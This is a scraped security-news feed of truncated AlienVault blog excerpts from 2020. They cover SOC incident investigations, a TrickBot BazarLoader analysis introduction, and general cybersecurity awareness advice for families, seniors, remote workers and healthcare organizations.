Recommendation After equipping our client with the necessary guidance to execute our suggested course of action, the customer informed us of their proposed next steps. At this juncture, we acknowledged the customer’s response and concluded the investigation. Persistent Alarms Shortly after the closing of the initial Investigation, alarms similar to those first examined began to reoccur. Considering the potential implications of persistent behavior of this nature, we made the conscious decision to re-open and continue our investigative efforts. The newly generated alarm varied slightly from the others in the respect that the most recent activity appeared to be a Remote Desktop Protocol (RDP) connection attempt. Though the customer had enforced firewall blacklisting on ingress traffic, we conveyed our recommendation to block outbound traffic as well. Response Building the investigation Bearing in mind the RDP activity, we decided to do a complete port scan of the customer asset in question in order to facilitate actionable insight with greater granularity. Figure 3 - Asset Scan Results Based on the results of the asset scan, we provided additional recommended actions to the customer. Tapping 15 years of sysadmin experience, we were able to also describe industr]]> 2020-06-08T13:00:00+00:00 https://feeds.feedblitz.com/~/626471480/0/alienvault-blogs~Stories-from-the-SOC-detecting-network-anomalies-with-OTX www.secnews.physaphae.fr/article.php?IdArticle=1756162 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Set Content & Privacy Restrictions Google Play (Android): Set up parental controls on Google Play Google Chrome: Change site permissions Parents and Guardians can purchase age-appropriate devices. Devices like the Amazon Fire Kids Edition or the Samsung Galaxy Kids and the PBS Playtime Pad. What about Social Media? Sites like Facebook, Twitter, Snapchat, TikTok, and Instagram are very popular. What precautions exist there? The social media platforms include information on privacy and security settings that can make their platforms safer for children. Unfortunately, these settings are not as front and center as they should be. Provided below are links to the security, privacy, and parental control sections of: Facebook: Messenger Kids Settings Twitter: Control Your Twitter Experience TikTok: Family Safety Mode and Screen Time Management Instagram: Tips for Parents Snapchat: Safety & Education The official minimum age to use many social media sites is thirteen. But, parents of children of all ages should be on their guard. Trolls, Predators, Bullys, and Cyber Criminals use Social Media as a tool for harassment and worse. The most important thing you can do to protect kids online is to teach them awareness. To not share personal information. For example, location, school, full name, age, social security number (if they know it), or tele]]> 2020-06-04T11:00:00+00:00 https://feeds.feedblitz.com/~/626081364/0/alienvault-blogs~Keeping-kids-safe-online www.secnews.physaphae.fr/article.php?IdArticle=1750091 False Tool None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Expanded Investigation Events Search When searching for additional events, we started by reviewing all failed login activity from the external host to see if any events were not captured in the alarm. Initially, there were twenty-five events associated with the alarm, one for each of the user accounts involved in this attack. Upon further review, we uncovered a total of sixty-two events, with multiple events per user. Each event was a failed login attempt that generated an “Invalid User” error. Event Deep Dive The attacker was using a system with an IP address from a foreign country to target the customer’s server (possibly a bastion host given the name). This foreign IP is listed as a scanning IP according to the Open Threat Exchange™. The user IDs seemed very explicit, indicating that the attacker potentially had access to a list of user IDs (via a phishing attempt or other compromise) and was trying to replicate them to gain access to an internal system. We looked into the usernames to determine if there was any additional activity involving them, but there was none outside of the incident in question. Reviewing for Additional Indicators We expanded our search to try and determine an additional point of entry or other IOCs which may be related to this incident, however we were unable to discover any. At this point the activity appeared to be a brute force attack from a known malicious host. Response Building the Investigation Given the urgency of the situation, we created a high-severity investigation. Utilizing the capabilities of the USM platform, the technology that underpins the AT&T Managed Threat Detection and Response service, we generated a CSV report for the customer, detailing the event activity we observed so they could have visibility into the events and evolving situation. After attaching our report, we developed our notes to the customer with an analysis of what we observed, recommendations for what to do, and reference material for the indicators. Customer Interaction The customer responded by agreeing with the analyst assessment that this was indeed an SSH Brute Force attempt. The customer blocked the foreign IP address for inbound and outbound connections to prevent future compromise attempts. The usernames were ultimately revealed to be invalid, so no further attempts were made to root cause how the attacker generated the list. ]]> 2020-06-03T11:00:00+00:00 https://feeds.feedblitz.com/~/625971134/0/alienvault-blogs~Stories-from-the-SOC-SSH-Brute-Force-Authentication-Attempt www.secnews.physaphae.fr/article.php?IdArticle=1748002 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Microsoft, an attacker resides on a compromised network a median time of 146 days before being discovered, making this kind of attack an advanced persistent threat (APT). In this amount of time, attackers residing on a network in stealth, can exfiltrate data, access applications to identify and use business details to commit fraud, or laterally move through a network gathering credentials for access to even more valuable data and resources. Why is threat hunting necessary? Organizations implementing good security practices and tools such as antivirus, email, and web scanning, firewalls, etc. are taking the necessary first steps. A layered security strategy can be effective in stopping the majority of cyberattacks. However, it should be assumed that some small percentage of advanced attacks will evade detection by traditional security solutions, giving cyber criminals access to an organization’s network for as long as they deem necessary to carry out their malicious activities. Because of the potential risk, it’s this small percentage of attacks that can spur an organization to participate in threat hunting. Implementing a security posture that prevents and detects attacks is defensive in nature – as the idea is to attempt to stop an attack before it happens. Threat hunting is a predictive and offensive tactic, based on the assumption that an attacker has already successfully gained access (despite an organization’s best efforts). Threat hunting uses a mixture of forensics capabilities and threat intelligence to track down where attackers have established footholds within the network and eliminate their access before any damaging malicious actions can take place. Threat hunting and indicators of compromise (IoCs) Threat hunting generally begins with security analysts working through threat intelligence, understanding of the environment they secure, and other security data sources to postulate about a potential threat. Threat hunters then look for indicators of compromise (IoCs) found in forensic “artifacts” to identify threatening activity that align with the hypothesized threat activity.  These artifacts are bits of data from server logs, network traffic, configurations, and more that help threat hunters determine if suspicious activities have taken place. Artifacts include: Network-based artifacts – Monitoring listening ports of internet-facing systems, threat hunters can monitor traffic as well as look through packet session recordings, looking for unusual outbound traffic, abnormal communication geographies, irregular amounts of inbound or outbound data, etc. Host-based artifacts – Changes in file systems and the Windows registry are two places threat hunters can find anomalous settings and content. Scanning registry values and monitoring changes made to file systems are common threat hunting activities. Authentication-based artifacts – Monitoring or reviewing the login (or attempted login) of privileged accounts on endpoint, servers, and services can be useful for a threat hunter to follow the trail used by an attacker to identify which accounts have been compromised and need to be remediated. ]]> 2020-06-02T11:00:00+00:00 https://feeds.feedblitz.com/~/625857202/0/alienvault-blogs~Threat-hunting-explained www.secnews.physaphae.fr/article.php?IdArticle=1745930 False Malware,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC There are around 39.5 million people in the U.S. aged over 65, and a high percentage of them, particularly women (nearly 40%) live alone. Living alone makes seniors more reliant on technology, which can be a savior (think Zoom, Skype and other communication-centered technology) as well as a threat (from phishing to fake antivirus software and bitcoin scams). Are seniors more vulnerable to cybersecurity threats, and if so, what can be done to reduce their risks? Are Seniors More Vulnerable To Online Scams? You may be surprised to learn that millennials are actually more vulnerable to online threats than seniors. A Federal Trade Commission report shows that “40 percent of adults age 20-29 who have reported fraud ended up losing money in a fraud case” (only 18% of adults aged 70+ are affected). However, the median loss for seniors is significantly higher - $1,092 compared to $400 in the 20-29 aged group. Common Cybersecurity Threats For Seniors Cyber criminals often use psychological strategies to attack the elderly. Many retirees have nest eggs that are targeted by fraudsters in ways that prey on specific vulnerabilities. Research published in the journal PLOS One showed that older internet users had almost twice the chance of being victimized by phishing attacks as younger users (53.46% compared to 26.37%). Criminals can also prey on a senior’s loneliness, using dating and romance scams, selling ‘medications’ and inviting users to donate to false charities. Fake websites abound with hidden charges or non-existing products. Finally, overtly simple or repeated passwords or PIN numbers can be hacked in a number of minutes. Helping Seniors Stay Safe Trust in scammers sometimes ensues because seniors feel unsafe in their homes. Family members can help by creating a safe environment in which smart home systems boost accessibility and security. Seniors who are able to communicate needs and concerns to family members, make requests regarding their needs, and learn to use technology such as voice assistants can be more empowered against scammers trying to abuse their disabilities or vulnerabilities. Family members living far from senior loved ones can also ensure that seniors have access to video call software, especially if they are deaf or mute and use sign language to communicate. The more secure a senior feels in terms of mobility, communication and security, the more likely they are to discuss proposed purchases of software, devices and other items with family members. This sense of safety can help seniors avoid the impulsive purchases or email responses that arise when people are in a state of panic or fear. Cybersecurity Awareness In addition to helping seniors install antivirus software and firewalls, it is important to help family members or clients raise awareness about common types of scams and red flags. For instance, pop-up windows, warnings of a virus and computer issues, and typical phishing email scams should be pointed out to seniors. Equally vital is informing seniors of the dangers of logging into bank and other private accounts through a link. The safe way, of course, is for seniors to directly enter into their financ]]> 2020-06-01T11:00:00+00:00 https://feeds.feedblitz.com/~/625757290/0/alienvault-blogs~Top-Cybersecurity-threats-For-seniors www.secnews.physaphae.fr/article.php?IdArticle=1744113 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC HTTPS, SSH, NNTPS, and LDAPS. So assuming that everything involved is working properly, if you use those ports over a VPN connection, your data is encrypted at least twice! PCs, smartphones, tablets, dedicated servers, and even some IoT devices can be endpoints for a VPN connection. Most of the time your client will need to use a VPN connection application. Some routers also have built-in VPN clients. Unlike proxy networks such as Tor, VPNs shouldn't noticeably slow down your internet traffic under usual circumstances. But some VPNs are faster than others, and one of the most important factors is how many VPN clients are using a VPN server at any given time. A VPN connection usually works like this. Data is transmitted from your client machine to a point in your VPN network. The VPN point encrypts your data and sends it through the internet. Another point in your VPN network decrypts your data and sends it to the appropriate internet resource, such as a web server, an email server, or your company's intranet. Then the internet resource sends data back to a point in your VPN network, where it gets encrypted. That encrypted data is sent through the internet to another point in your VPN network, which decrypts the data and sends it back to your client machine. Easy peasy! Types of VPN technologies Different VPNs can use different encryption standards and technologies. Here's a quick list of some of the technologies that a VPN may use: Point-to-Point Tunneling Protocol: PPTP has been around since the mid 1990s, and it's still frequently used. PPTP in and of itself doesn't do encryption. It tunnels data packets and then uses the GRE protocol for encapsulation. If you're considering a VPN service which uses PPTP, you should keep in mind that security experts such as Bruce Schneier have found the protocol, especially Microsoft's implem]]> 2020-05-31T11:00:00+00:00 https://feeds.feedblitz.com/~/625800778/0/alienvault-blogs~Explain-how-VPN-works www.secnews.physaphae.fr/article.php?IdArticle=1745932 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC According to the CDC, “A pandemic is a global outbreak of disease. Pandemics happen when a new virus emerges to infect people and can spread between people sustainably. Because there is little to no pre-existing immunity against the new virus, it spreads worldwide.” Enter COVID-19 COVID-19 is the name of the disease caused by the novel coronavirus, SARS-COV-2. SARS-COV-2 spreads from person to person, through droplets or aerosols, by entering the nose, mouth, or eyes. Aerosol spread is particularly infectious, because it means that an asymptomatic person can spread the disease just by talking, and the virus particles can live in the air up to three hours. When you become infected by SARS-COV-2, you have COVID-19 (the disease state), even if you are asymptomatic. Stopping the spread As COVID-19 spread around the world, “hot-spots” developed in China, then Italy and other parts of Europe, followed by New York City. Social distancing became a primary means of mitigating the spread. Countries like South Korea and New Zealand implemented vast testing protocols early and began contact tracing, so that huge parts of society did not have to shut down for long periods of time. Time to contrast the COVID-19 pandemic with malware. What is malware? Malware is an abbreviation of “malicious code.” NIST defines malware as “hardware, firmware, or software that is intentionally includ]]> 2020-05-27T11:00:00+00:00 https://feeds.feedblitz.com/~/625297562/0/alienvault-blogs~How-malware-mimics-the-spread-of-COVID www.secnews.physaphae.fr/article.php?IdArticle=1736073 False Malware,Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Image 1 - Initial Alarm Observing the initial alarm, the first event captured was an internal IP out-calling to a known malicious C2 IP (208[.]100[.]26[.]245). This simple event is an initial clue into the internal system potentially being compromised. A hasty review could suggest that the alarm could be closed out as auto-mitigated, given that we’re observing that the session had been denied. But, a good analyst should dig a little deeper in order to confirm that no persistent threat remains within the internal system that tried to out-call the malicious C2 IP. Expanded Investigation Events Search Image 2 - Pivot on IP/Events In order to further investigate the alarm, we dropped down to the child server/customer deployment to pivot on events logged by internal IP (asset 1), in order to correlate/identify any suspicious activity observed within the internal system. The analyst should take full advantage of the visibility into the different data sources compatible with USM Anywhere in order to build a more complete profile of the traffic being generated by the asset in question. In the alarm/event, we observed firewall and endpoint events associated with the internal IP. This obviously indicates that the internal IP/asset was undertaking activities that are being blocked/denied by these two security tools. Further investigation should be undertaken. IOC - Malicious C2 server: Reviewing the different endpoint and firewall logs, we confirmed that the internal system was in fact compromised and observed an attacker attempting malicious lateral movement. Specifically, they were trying to access port 445 SMB and attempt a brute force authentication against another internal asset. As seen in the screenshot below, event ID 6045 was generated and indicates an "SMB Brute Force Attack" with threat severity "Critical”. Image 3 - Lateral Movement Reviewing for Additional Indicators The agent installed on the compromised endpoint was able to give deeper insights into the actual system such as services running, open ports, and installed software. By analyzing the enriched data reporting back from the agent and previous scans, the compromised system had SMB port 445 open and was running an EOL version of Windows XP. This indicates that no Microsoft security updates have been installed and some of the most exploitable vulnerabilities, such as Bluekeep, affecting SMB over IP were surely to be found on the compromised system. This evidence further confirmed the asset as a probable entry point for the compromise and built the beginnings of our remediation and containment recommendations. Referencing the ]]> 2020-05-26T11:00:00+00:00 https://feeds.feedblitz.com/~/625198716/0/alienvault-blogs~Stories-from-the-SOC-System-compromise-with-lateral-movement www.secnews.physaphae.fr/article.php?IdArticle=1736074 True Malware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Image 1 - Initial Alarm Observing the initial alarm, the first event captured was an internal IP out-calling to a known malicious C2 IP (208[.]100[.]26[.]245). This simple event is an initial clue into the internal system potentially being compromised. A hasty review could suggest that the alarm could be closed out as auto-mitigated, given that we’re observing that the session had been denied. But, a good analyst should dig a little deeper in order to confirm that no persistent threat remains within the internal system that tried to out-call the malicious C2 IP. Expanded Investigation Events Search Image 2 - Pivot on IP/Events In order to further investigate the alarm, we dropped down to the child server/customer deployment to pivot on events logged by internal IP (asset 1), in order to correlate/identify any suspicious activity observed within the internal system. The analyst should take full advantage of the visibility into the different data sources compatible with USM Anywhere in order to build a more complete profile of the traffic being generated by the asset in question. In the alarm/event, we observed firewall and endpoint events associated with the internal IP. This obviously indicates that the internal IP/asset was undertaking activities that are being blocked/denied by these two security tools. Further investigation should be undertaken. IOC - Malicious C2 server: Reviewing the different endpoint and firewall logs, we confirmed that the internal system was in fact compromised and observed an attacker attempting malicious lateral movement. Specifically, they were trying to access port 445 SMB and attempt a brute force authentication against another internal asset. As seen in the screenshot below, event ID 6045 was generated and indicates an "SMB Brute Force Attack" with threat severity "Critical”. Image 3 - Lateral Movement Reviewing for Additional Indicators The agent installed on the compromised endpoint was able to give deeper insights into the actual system such as services running, open ports, and installed software. By analyzing the enriched data reporting back from the agent and previous scans, the compromised system had SMB port 445 open and was running an EOL version of Windows XP. This indicates that no Microsoft security updates have been installed and some of the most exploitable vulnerabilities, such as Bluekeep, affecting SMB over IP were surely to be found on the compromised system. This evidence further confirmed the asset as a probable entry point for the compromise and built the beginnings of our remediation and containment recommendations. Referencing the ]]> 2020-05-26T11:00:00+00:00 https://feeds.feedblitz.com/~/625198716/0/alienvault-blogs~Stories-from-the-SOC-System-compromise-with-ateral-movement www.secnews.physaphae.fr/article.php?IdArticle=1734470 False Malware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC @pancak3lullz) and Vitali Kremez (@VK_Intel) posted a Tweet regarding two new TrickBot modules aptly named “BazarLoader” and “BazarBackdoor” after attempted Command and Control (C2) communications with the Emercoin DNS (EmerDNS) .bazar domains. EmerDNS is desirable for attackers because it is a distributed blockchain that is decentralized, cannot be censored, and cannot be altered, revoked or suspended by any authority. Alien Labs’ automated malware analysis engine had picked up these samples a few days earlier (Ex: 7c93d9175a38c23d44d76d9a883f7f3da1e244c2ab6c3ac9f29a9c9e20d20a5f) BleepingComputer posted a blog with input from Vitali Kremez regarding a phishing campaign distributed through the Sendgrid email marketing platform delivering COVID-19 lures that ultimately led to the TrickBot BazarBackdoor. The purpose of this blog is to provide additional technical details and an in-depth study of the signed TrickBot BazarLoader.    Background Since TrickBot was discovered in 2016 it has been involved in information stealing, credential theft, ransomware, bitcoin mining, and loading other common crimeware malware as a first or second stage loader. For initial access as a first stage loader it typically accomplishes its objective through spear phishing links (T1192) or spear phishing attachments (T1193) using macro enabled Microsoft Office files. As a second stage payload and Dynamic Link Library (DLL) it is frequently loaded by Emotet. To a lesser extent TrickBot has been loaded by Ostap JavaScript Downloader and Buer Loader. In higher priority, higher profile TrickBot Anchor campaigns that target enterprises, PowerTrick and more_eggs/TerraLoader have been used to load other frameworks. TrickBot has recently added a Remote Desktop Protocol (RDP) brute force scanner module, an Active Directory (AD) harvesting module, and the mexec executor module. There are some indications that TrickBot may be moving away from their mshare, mworm, and tabDll modules for retrieving payloads from URLs in favor of the “nworm]]> 2020-05-19T12:00:00+00:00 https://feeds.feedblitz.com/~/624418298/0/alienvault-blogs~TrickBot-BazarLoader-InDepth www.secnews.physaphae.fr/article.php?IdArticle=1718068 False Malware,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC https://www.businessinsider.com/7-emerging-technologies-that-cybersecurity-experts-are-worried-about-2019-10#quantum-computing-could-easily-crack-encryption-2).  State sponsored threat actors will have access to such platforms very early on (and likely already do).  However, since broader access to such computing platforms will likely be made available in the cloud, other threat actor groups will be able to utilize these platforms sooner than you might think.  Given an organization’s compliance concerns, the risk posed to legacy encryption solutions for data at rest and in transit will likely require updates to security policies and requirements for how data is encrypted and potentially where encrypted data resides.  Even at a high level, this thought exercise illustrates how innovations can impact the technical and operational environments, but in this, not all businesses are created equal. The degree of disruption caused by a technology innovation, or combination of innovations, is both industry dependent and business specific.  Revisiting the music industry example, the rise of compressed digital music formats when c]]> 2020-05-18T12:00:00+00:00 https://feeds.feedblitz.com/~/624331600/0/alienvault-blogs~Disruption-on-the-horizon www.secnews.physaphae.fr/article.php?IdArticle=1716046 False Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Unsplash The COVID-19 pandemic sweeping the globe has effectively put a stop to the bulk of face-to-face interactions. With social distancing and shelter in place orders in effect, people are stuck at home and relying on the Internet as not only a tool for communication and entertainment but as their only way to earn money during this hectic and uncertain time. With this new and unexpected reliance on connectivity, both companies and consumers should take extra precautions in ensuring that their data is protected. Cybercriminals are using this chaotic situation to try to obtain sensitive materials. Online Access Is More Important Than Ever The COVID-19 pandemic has left millions unemployed or working exclusively from home without warning or time for preparation. Fortunately, many Internet providers are offering low-cost options and waiving late payment fees to ease the financial burden on those who are stuck at home without gainful employment. Regardless of whether people are working from home or not, they still rely on the Internet for socialization and entertainment since both of those “in-person” options have been taken away unceremoniously. As more and more people find themselves using their Internet connections for work and leisure during their time indoors, solid and reliable service has become vital for many. Outages could have potentially disastrous results, not only for individuals but for entire companies and their workforce. Everyone has now been moved exclusively online. This situation has put tremendous pressure on the Internet infrastructure throughout the world and has heightened the need for cybersecurity measures across the board. Whether working from home or simply using the Internet for entertainment purposes, the increased number of people who are online means that there are more opportunities to fall prey to cyber-attacks. It is important for those who find themselves spending significantly more time online to exercise increased caution in the coming weeks and months to protect themselves and their workplaces from criminals who seek to do serious harm. How Cybercriminals Are Taking Advantage Working from home, while being a great opportunity for many to continue making money, has also introduced many workers to online work-related software for the first time. This inherently increases the risk of cyber-attacks and phishing schemes due to increased online traffic from people who may not be well-versed in cybersecurity practices. Phishing schemes can prey on anyone who uses the internet. They work by getting users to click on malicious links or documents. The risk of this has increased during the COVID-19 pandemic due to the sheer number of e-mails being sent to and from employers and employees, providing the opportunity for cybercriminals to prey on those who aren’t used to practicing basic cybersecurity as part of their daily work. With so many workers turning to their smart devices to work, mobile application security is paramount to the cybersecurity of both personal files and sensitive data that they might have access to through work. While many people ar]]> 2020-05-14T12:00:00+00:00 https://feeds.feedblitz.com/~/623955074/0/alienvault-blogs~The-importance-and-security-concerns-of-staying-connected-during-the-COVID-pandemic www.secnews.physaphae.fr/article.php?IdArticle=1709306 False Tool,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Photo by Hush Naidoo on Unsplash This blog was written by an independent guest blogger.rA recent attack on a hospital in Brno, Czech Republic (a COVID-19 testing center)ehowed the extent to which weaknesses in a health center’s cybersecurity system can endanger the lives of patients. During this attack, patients had to be redirected to other hospitals and vital surgeries were postponed - all during a time in which vital testing needed to be carried out and releases needed to be sped up. A study published in the journal Technological Health Care by CS Kruse et al. has found that “The healthcare industry is a prime target for medical information theft as it lags behind other leading industries in securing vital data.” It is vital, warn the researchers, to invest time and funding in protecting healthcare technology and in ensuring the confidentiality of patient information. Time is of the essence in healthcare Cybersecurity attacks interfere with vital work undertaken in the health sector - for instance, when ransomware makes crucial data inaccessible. Cyber attacks also lengthen already excessive waiting times, clogging systems during health crisis such as the current COVID-19 pandemic. A recent The Guardian article revealed that in many American hospitals, health insurance authorization can take days, leaving patients stuck in the hospital at a time when beds are needed. Some groups in particular - including military veterans - have coverage that can take time to receive authorization for. This is because not all vets are covered by TRICARE or the Veterans Health Care Program. If they have a high enough disability factor, they may be enrolled in different benefits plans than those without disabilities. Bureaucratic requirements can also vary depending on the institution and its verification requirements. What are the most common attacks on the healthcare sector? Attacks on hospitals and other centers that obtain and record data include ransomware attacks and (currently) Covid-19 themed phishing attacks. Healthcare professionals such as nurses and doctors - who have access to a wide array of data - are often the target of phishing scams. The new importance of remote work has also led to big weaknesses in security systems, with individual home systems often lacking the safety features that in-hospital systems rely on daily. Threats also include cloud threats owing to the lack of proper encryption, misleading websites that are similar to trustworthy sites, employee errors (weak passwords and failure to comply with security protocol), and blind spots in encryption systems. Crucial steps for health organizations  To combat these attacks, healthcare organizations need to adopt optimal centralized security with enhanced detection and response. They also need to review current security systems to spot potential weaknesses and take into account all aspects of current operations - including employees’ wearable devices, smartphones, cloud sharing systems, and the like. Health]]> 2020-05-13T12:00:00+00:00 https://feeds.feedblitz.com/~/623845248/0/alienvault-blogs~Why-cybersecurity-In-the-healthcare-sector-needs-improvement www.secnews.physaphae.fr/article.php?IdArticle=1706752 False Ransomware,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Now more than ever organizations globally want to better understand, manage, and minimize security risks. To achieve this, security leaders should be regularly assessing their processes and programs to gain a sense of their organization’s security maturity, where gaps exist, and what can be done to improve security posture. In March 2020, AT&T Cybersecurity and Enterprise Strategy Group (ESG) completed a benchmark survey aimed at helping organizations understand what a mature cybersecurity program looks like and how that maturity influences security and business outcomes. Results from the 500 security professionals surveyed on their processes, policies, and controls were mapped into the NIST Cybersecurity Framework’s (CSF) five foundational cybersecurity functions: identify, protect, detect, respond, and recover. The goal of this unique research was to validate if — and to what degree — organizations in better alignment with best practices prescribed by the NIST CSF can operate more secure environments and better enable their businesses. This was accomplished through the creation of a data-driven model that segments respondents into three levels of cybersecurity maturity: Emerging organizations Following organizations Leading organizations By comparing survey results across these levels, the model allows us to use data to quantify the differences in security and business outcomes that exist as maturity level improves. One of the more interesting findings that came out of the research (and quite hopeful), is that cybersecurity maturity is not directly dependent on company size. One might assume only the largest organizations, with the most resources, would be able to implement a cybersecurity program sophisticated enough to achieve “leader” status. However, the research shows that the median company size is identical across all three maturity levels – “leading”, “following”, and “emerging.” The fact that there is no correlation between company size and maturity level indicates to us that doing cybersecurity well is less a function of resources and more a function of thoughtful consideration, planning, and organizational culture. While technology and staff investments matter, the research indicates that organizations of any size can achieve a highly mature cybersecurity program. To read these research findings, download the full report. There's also a nice infographic.  In addition to our research, AT&T Cybersecurity and ESG have developed a free self-assessment tool that enables organizations to measure their security maturity based on the survey’s benchmark data and the NIST cybersecurity framework. Take the free maturity assessment.  ]]> 2020-05-12T12:00:00+00:00 https://feeds.feedblitz.com/~/623751342/0/alienvault-blogs~The-relationship-between-security-maturity-and-business-enablement www.secnews.physaphae.fr/article.php?IdArticle=1704939 False Tool,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Figure 1 - Initial Alarm Expanded investigation Alarm Detail Also included in the alarm details is the associated MITRE ATT&CK® rule attack ID, which afforded the ability to efficiently and expeditiously gather relevant information about this potential attempt to compromise the customer’s Office 365 account. The synopsis for this attack technique is defined as the attempt to “… steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process…”   Correlation Rule Logic Figure 2 - Correlation Logic Correlated Events Figure 3 - U.S. Login Event Simultaneous logins were detected from both the United States and a foreign country, generating two events, like the one pictured above, with different source countries. These successful logins occurred within two minutes of one another; thus, triggering the Credential Abuse alarm. Response Building the investigation The successful login attempts’ origin and volume deriving from the United States fall within the baseline activity for this user. However, there was a sudden surge in attempts from a foreign country that aligned with the timeline of when this account had appeared to have been successfully compromised. Customer interaction In order to effectively articulate the login irregularities to the customer, our team did a retrospective query to analyze successful authentication attempts for this particular Office365 user. Utilizing advanced query capabilities within USM Anywhere]]> 2020-05-11T12:00:00+00:00 https://feeds.feedblitz.com/~/623668652/0/alienvault-blogs~Stories-from-the-SOC-Office-Credential-Abuse www.secnews.physaphae.fr/article.php?IdArticle=1703027 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC assess and adapt for resiliency across their entire ecosystem, especially their remote and mobile workforces. Unified endpoint security should be one of the top priorities. Hearing the term “endpoint,” one primarily thinks of a laptop or desktop. However, endpoints are really anything connected to the company network or the internet. This includes mobile phones, smartphones, tablets, servers, and even specialized hardware such as Point of Sale (POS) systems and other Internet of Things devices. And in this current environment, it also means corporate-owned and bring your own devices (BYOD) as well as various operating systems. Ultimately, this suggests that “endpoint security” encompasses many unique variables that need to be managed. Implementing an industry-leading Unified Endpoint Management (UEM) solution is paramount given these circumstances. UEMs onboard, deploy, configure, and enroll devices so that the workforce can get up and running quickly. They help devices stay compliant with industry- and company-mandated regulations. UEMs today are also able to do advanced IT management actions like view or remote in on a device as if they had the device in their hand to help troubleshoot issues. All key capabilities when the IT manager can’t be in the same room as the device. UEM describes only the management aspects of unified endpoint security. Businesses must also consider the security elements needed to protect endpoints from advanced cyber threats. Endpoints have a huge target on them for cyber criminals with 70% of breaches originating on the endpoint. Cyber criminals recognize that endpoints are an effective way to launch an attack. Recent mobile device testing revealed up to 25% of employees are fooled into clicking phishing links.  Although businesses recognized ]]> 2020-05-07T12:00:00+00:00 https://feeds.feedblitz.com/~/623387468/0/alienvault-blogs~Remote-workers-making-mobile-management-and-security-first-priority www.secnews.physaphae.fr/article.php?IdArticle=1696671 False Malware,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC In these days of uncertainty caused by the COVID-19 biological virus, fear is a button begging to be pushed.  These fears make it more likely for someone to click on an attachment or link claiming to provide updates and warnings about the situation.  So please stay alert for those COVID-19, Zoom™, Teams, and other work-from-home themed phishing attempts and let’s avoid creating any new anniversaries for worldwide malicious events.    ]]> 2020-05-06T18:00:00+00:00 https://feeds.feedblitz.com/~/623337734/0/alienvault-blogs~Recalling-the-ILOVEYOU-worm-from-years-ago www.secnews.physaphae.fr/article.php?IdArticle=1694965 False Ransomware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC seven percent of U.S. workers regularly enjoyed the option of working from home. Well accustomed to the nature of remote work, these individuals were equipped with stable internet connections, collaboration and communication tools, and security technologies that helped them excel from their home offices. As concerns regarding the spread of COVID-19 grew, , nations around the world opted to enforce social distancing guidelines to prevent the infectious disease from spreading. In response, companies of all sizes have been forced to embrace remote work without much time to plan ahead. Some businesses have shifted to as much as one hundred percent of their employees working from home. As all parties involved adjust to this new way of working, critical concerns regarding the security of data and systems have surfaced and must be addressed to prevent cyber breaches. Here are five tips every enterprise should consider for better security of remote workers: Ensure your information security policy covers remote work use cases In companies unaccustomed to remote work, information security policies tend to be written under the assumption that employees are on site. This has led to gaps in guidance on how workers should maintain the security of data and applications while working remotely. The sudden shift to home office setups requires that policies and procedures be established or updated to account for this new reality. Examples of relevant remote security policy components include, but are not limited to, mobile device management, access control, acceptable use, and more. For example, a Mobile Device Management (MDM) policy should describe the controls required to secure, monitor, and manage mobile devices used by employees. An access control policy is another common policy that already exists in most companies; however, it may not have been written with remote work in mind. This policy should include guidance on granting, monitoring, and terminating remote access for employees and third parties. Photo by Dan Nelson on Unsplash Address security risks associated with employees working on personal devices Some employees are now required to use personal devices to access sensitive information for work-related tasks. This increases the risk of potential data loss or leakage, and also makes it challenging to maintain visibility into employee actions. Defining a Bring Your Own Device (BYOD) strategy is an essential step in enhancing company security when employees may begin using their personal devices for business purposes. The policy should include guidelines on the minimum required device security controls, acceptable use cases, prohibited actions, and information on any company-sanctioned security tools that can be used to conduct business securely. It’s also important to discuss any employee rights or privacy implications when managing personal user devices that are connected to the corporate network. Lastly, the strategy should include plans for addressing lost or stolen personal devices that may have included sensitive company information. Get a handle on growing third party risks A]]> 2020-05-06T12:00:00+00:00 https://feeds.feedblitz.com/~/623317512/0/alienvault-blogs~Balancing-security-and-flexibility-with-a-remote-workforce www.secnews.physaphae.fr/article.php?IdArticle=1694220 False Malware,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC ​419,643 indicators of compromise (IOC) related to COVID-19, including a​ 2,000% month-over-month increase from February to March. Cybercriminals are taking advantage of the shift to remote working, increasing their volume of attacks by nearly 40% in the last month. Home routers have been hijacked. COVID-19-themed phishing attacks have jumped 500%. And most of 4,000 new COVID-19 domains are suspected of criminal intent. Companies large and small are in a bad spot on this one. Asking staff to come to the office could worsen the health crisis. Having them work at home creates a vastly increased attack surface that cybercriminals can easily exploit. And in the meantime, trying to highly secure every employee’s home is about every IT Manager’s worst nightmare. I have the advantage of working for a large company, where there is not much difference between working at the office or at home. But for most, the new remote work environment ushers in an entirely new security landscape overnight. Long term, this means acceleration of cloud security and zero trust models. But for the short term, here are a few suggestions that I’d like to offer. These may be basic concepts, but in security, the basics matter most, and they are often easy to implement. 1. Teach staff how to “socially distance” their home networks. When you think about who is using a home WiFi network in an average American family, it is unlikely that many of them are particularly cyber-savvy. If one or more  adult members of a typical family are connecting to the office by remote these days, that leaves gaps for children, visitors and non-working adults who may also be accessing the internet via that home network. The first and easiest “fix” that staff should do is to partition their home internet access. They should try to avoid children, their schoolmates, and even adult friends playing video games, checking email, and downloading movies on the same network connection that is used to log into the office. This opens the door to a tidal wave of unknown vulnerabilities. Staff should also avoid logging in on the same connection utilized by home IoT devices such as smart thermostats, wireless doorbell cameras, and virtual personal assistants. If you need any convincing 